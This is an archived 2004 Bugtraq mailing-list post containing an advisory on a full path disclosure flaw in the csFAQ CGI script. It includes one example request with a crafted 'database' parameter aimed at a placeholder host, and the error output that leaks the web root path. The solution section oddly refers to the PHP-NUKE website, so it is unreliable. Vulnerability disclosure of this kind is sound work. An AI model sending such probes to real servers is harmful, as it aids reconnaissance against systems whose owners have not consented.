Full path disclosure csFAQ

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Full path disclosure csFAQ
From: "DarkBicho" <darkbicho@xxxxxxxxxxx>
Date: Sun, 27 Jun 2004 17:43:29 -0700
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

http://www.swp-zone.org/archivos/advisory-08.txt

-------------------------------------------------------------------------------------------------

                            :.: Full path disclosure csFAQ :.: 

  PROGRAM: csFAQ
  HOMEPAGE: http://www.cgiscript.net/
  BUG: Full path disclosure
  DATE:  23/05/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Email: darkbicho@xxxxxxxx

-------------------------------------------------------------------------------------------------

1.- Affected software description:
    ------------------------------
    csFAQ An automated system for displaying FAQs (frequently asked
    questions)  written  by
    CGI Scripts.

2.- Description: 
    ------------
    This vulnerability would allow a remote user to determine the full
    path to the web root directory and other potentially sensitive
    information.


    :.: Examples:

    
http://www.attack.com/cgi-script/csFAQ/csFAQ.cgi?command=viewFAQ&database=/.darkbicho


    /www/attack/cgi-script/csFAQ//%2f%2edarkbicho
    Content-type: text/html 
    Software error:
    1 at csFAQ.cgi line 1117.

3.- SOLUTION:
     ¨¨¨¨¨¨¨¨
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon. 
    Check the PHP-NUKE website for updates and official release details. 

4.- Greetings:
    ---------

    greetings to my Peruvian group swp, perunderforce and machado ;) 
    "EL PISCO ES Y SERA PERUANO"

5.- Contact
    -------

    WEB: http://www.darkbicho.tk
    EMAIL: darkbicho@xxxxxxxx
  
-------------------------------------------------------------------------------------------------
                                ___________      ____________ 
                               /   _____/  \    /  \______   \   
                               \____   \\   \/\/   /|     ___/      
                              /         \\        / |    |        
                             /_____ __  / \__/\  /  |____|       
                             \/       \/        
                                Security Wari Projects 
                                  (c) 2002 - 2004
                                    Made in Peru

----------------------------------------[   EOF   
]----------------------------------------------
 
  
  
DarkBicho  
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------

Prev by Date: [ GLSA 200406-22 ] Pavuk: Remote buffer overflow
Next by Date: DLINK 614+ - SOHO routers, DHCP service DOS
Previous by thread: [ GLSA 200406-22 ] Pavuk: Remote buffer overflow
Next by thread: DLINK 614+ - SOHO routers, DHCP service DOS
Index(es):
- Date
- Thread